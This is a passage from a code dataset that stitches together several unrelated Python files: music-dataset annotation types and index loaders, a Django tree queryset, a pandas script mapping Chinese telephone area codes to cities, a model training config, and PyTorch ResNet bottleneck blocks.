"LyricData", ["start_times", "end_times", "lyrics", "pronunciations"]
)
SectionData = namedtuple("SectionData", ["intervals", "labels"])
BeatData = namedtuple("BeatData", ["beat_times", "beat_positions"])
ChordData = namedtuple("ChordData", ["intervals", "labels"])
KeyData = namedtuple("KeyData", ["start_times", "end_times", "keys"])
TempoData = namedtuple("TempoData", ["time", "duration", "value", "confidence"])
EventData = namedtuple("EventData", ["start_times", "end_times", "event"])
def load_json_index(filename):
working_dir = os.path.dirname(os.path.realpath(__file__))
with open(os.path.join(working_dir, "datasets/indexes", filename)) as f:
return json.load(f)
class cached_property(object):
"""A property that is only computed once per instance and then replaces
itself with an ordinary attribute. Deleting the attribute resets the
property.
Source: https://github.com/bottlepy/bottle/commit/fa7733e075da0d790d809aa3d2f53071897e6f76
"""
def __init__(self, func):
self.__doc__ = getattr(func, "__doc__")
self.func = func
def __get__(self, obj, cls):
# type: (Any, type) -> Any
if obj is None:
return self
value = obj.__dict__[self.func.__name__] = self.func(obj)
return value
class LargeData(object):
def __init__(self, index_file, metadata_load_fn=None, remote_index=None):
"""Object which loads and caches large data the first time it's
accessed.
Parameters
----------
index_file: str
File name of checksum index file to be passed to `load_json_index`
metadata_load_fn: function
Function which returns a metadata dictionary.
If None, assume the dataset has no metadata. When the
`metadata` attribute is called, raises a NotImplementedError
"""
self._metadata = None
self.index_file = index_file
self.metadata_load_fn = metadata_load_fn
self.remote_index = remote_index
@cached_property
def index(self):
if self.remote_index is not None:
working_dir = os.path.dirname(os.path.realpath(__file__))
path_index_file = os.path.join(
working_dir, "datasets/indexes", self.index_file
)
if not os.path.isfile(path_index_file):
path_indexes = os.path.join(working_dir, "datasets/indexes")
download_utils.downloader(path_indexes, remotes=self.remote_index)
return load_json_index(self.index_file)
def metadata(self, data_home):
if self.metadata_load_fn is None:
raise NotImplementedError
if self._metadata is None or self._metadata["data_home"] != data_home:
self._metadata = self.metadata_load_fn(data_home)
return self._metadata
| StarcoderdataPython |
3366179 | from django.db import models
class TreeQuerySet(models.query.QuerySet):
def get_descendants(self, *args, **kwargs):
return self.model.objects.get_queryset_descendants(self, *args, **kwargs)
get_descendants.queryset_only = True
def get_ancestors(self, *args, **kwargs):
return self.model.objects.get_queryset_ancestors(self, *args, **kwargs)
get_ancestors.queryset_only = True
| StarcoderdataPython |
1714423 | # encoding: utf-8
# 处理 var125-126
import pandas as pd
import re
# 区号
code_df = pd.read_csv("../../data/area_code.csv", encoding='gbk')
code_dict = {}
for i in range(0, len(code_df)):
code_dict.update({code_df['区号'][i]: code_df['城市'][i]})
# 省名
provinces = ('河北', '山西', '辽宁', '吉林', '江苏', '浙江', '安徽', '福建',
'江西', '山东', '河南', '湖北', '湖南', '广东', '海南', '四川',
'贵州', '云南', '陕西', '甘肃', '青海', '广西', '西藏', '宁夏',
'新疆', '黑龙江', '内蒙古')
def repl_in(s):
while (True):
search_res = re.search(r'@([0-9]\d*)@', s)
if search_res == None:
return s
num_str = search_res.group().replace('@', '')
num = int(num_str)
if num in code_dict.keys():
s = s.replace(num_str, code_dict[num])
else:
s = s.replace(num_str, '未知')
def repl_left(s):
while (True):
search_res = re.search(r'^([0-9]\d*)@', s)
if search_res == None:
return s
num_str = search_res.group().replace('@', '')
num = int(num_str)
if num in code_dict.keys():
s = s.replace(num_str, code_dict[num])
else:
s = s.replace(num_str, '未知')
def repl_right(s):
while (True):
search_res = re.search(r'@([0-9]\d*)$', s)
if search_res == None:
return s
num_str = search_res.group().replace('@', '')
num = int(num_str)
if num in code_dict.keys():
s = s.replace(num_str, code_dict[num])
else:
s = s.replace(num_str, '未知')
def repl_only(s):
while (True):
search_res = re.search(r'^([0-9]\d*)$', s)
if search_res == None:
return s
num_str = search_res.group().replace('@', '')
num = int(num_str)
if num in code_dict.keys():
s = s.replace(num_str, code_dict[num])
else:
s = s.replace(num_str, '未知')
def repl_sheng(s):
if s == None:
return ''
if len(s) >= 4:
if (s[:2] in provinces):
return s.replace(s[:2], '')[:2] + ' '
elif (s[:3] in provinces):
return s.replace(s[:3], '')[:2] + ' '
else:
return s[:2] + ' '
elif len(s) == 3:
return s[:2] + ' '
return s + ' '
# 处理var125,var126
def process(var):
var = var.fillna('空值')
var = var.str.strip().str.replace('[A-Z]*','')\
.str.replace('[a-z]*','').str.replace('\[|\]','')
var = var.str.strip().str.replace('省|市','').str.replace('+','')\
.str.replace(';','').str.replace('.','')
var = var.apply(repl_in).apply(repl_left).apply(repl_right).apply(repl_only)
var = var.str.replace('[0-9]*','')
var = var.str.replace(' 公司开通3G出访','').str.replace('(|)','')\
.str.replace('成都资阳眉山三地','成都').str.replace('--','未知')
var = var.str.split('@', expand=True)
for col in var:
var[col] = var[col].apply(repl_sheng)
return var.T.sum().str.strip()
| StarcoderdataPython |
3253477 | <filename>model_zoo/research/cv/dem/src/config.py<gh_stars>1-10
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""
network config setting, will be used in train.py
"""
from easydict import EasyDict as edict
awa_cfg = edict({
'lr_att': 1e-5,
'wd_att': 1e-2,
'clip_att': 0.2,
'lr_word': 1e-4,
'wd_word': 1e-3,
'clip_word': 0.5,
'lr_fusion': 1e-4,
'wd_fusion': 1e-2,
'clip_fusion': 0.5,
'batch_size': 64,
})
cub_cfg = edict({
'lr_att': 1e-5,
'wd_att': 1e-2,
'clip_att': 0.5,
'batch_size': 100,
})
| StarcoderdataPython |
3355354 | import torch.nn as nn
import ipdb
class Bottleneck(nn.Module):
expansion = 4
only_2D = False
def __init__(self, inplanes, planes, stride=1, downsample=None, dilation=1):
super(Bottleneck, self).__init__()
self.conv1 = nn.Conv3d(inplanes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm3d(planes)
self.conv2 = None
self.bn2 = nn.BatchNorm3d(planes)
self.conv3 = nn.Conv3d(planes, planes * 4, kernel_size=1, bias=False)
self.bn3 = nn.BatchNorm3d(planes * 4)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
self.input_dim = 5
self.dilation = dilation
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class Bottleneck3D(Bottleneck):
def __init__(self, inplanes, planes, stride=1, downsample=None, dilation=1, **kwargs):
super().__init__(inplanes, planes, stride, downsample, dilation)
self.conv2 = nn.Conv3d(planes, planes, kernel_size=3, stride=stride,
padding=1, bias=False, dilation=(1, dilation, dilation))
class Bottleneck2D(Bottleneck):
def __init__(self, inplanes, planes, stride=1, downsample=None, dilation=1, **kwargs):
super().__init__(inplanes, planes, stride, downsample, dilation)
# to speed up the inference process
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False, dilation=dilation)
self.bn3 = nn.BatchNorm2d(planes * 4)
self.input_dim = 4
if isinstance(stride, int):
stride_1, stride_2 = stride, stride
else:
stride_1, stride_2 = stride[0], stride[1]
self.conv2 = nn.Conv2d(planes, planes, kernel_size=(3, 3), stride=(stride_1, stride_2),
padding=(1, 1), bias=False)
class Bottleneck2_1D(Bottleneck):
def __init__(self, inplanes, planes, stride=1, downsample=None, dilation=1, nb_temporal_conv=1):
super().__init__(inplanes, planes, stride, downsample, dilation)
if isinstance(stride, int):
stride_2d, stride_1t = (1, stride, stride), (stride, 1, 1)
else:
stride_2d, stride_1t = (1, stride[1], stride[2]), (stride[0], 1, 1)
# CONV2
self.conv2 = nn.Conv3d(planes, planes, kernel_size=(1, 3, 3), stride=stride_2d,
padding=(0, dilation, dilation), bias=False, dilation=dilation)
self.conv2_1t = nn.Sequential()
for i in range(nb_temporal_conv):
temp_conv = nn.Conv3d(planes, planes, kernel_size=(3, 1, 1), stride=stride_1t,
padding=(1, 0, 0), bias=False, dilation=1)
self.conv2_1t.add_module('temp_conv_{}'.format(i), temp_conv)
self.conv2_1t.add_module(('relu_{}').format(i), nn.ReLU(inplace=True))
def forward(self, x):
residual = x
## CONV1 - 3D (1,1,1)
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
## CONV2
# Spatial - 2D (1,3,3)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
# Temporal - 3D (3,1,1)
out = self.conv2_1t(out)
## CONV3 - 3D (1,1,1)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.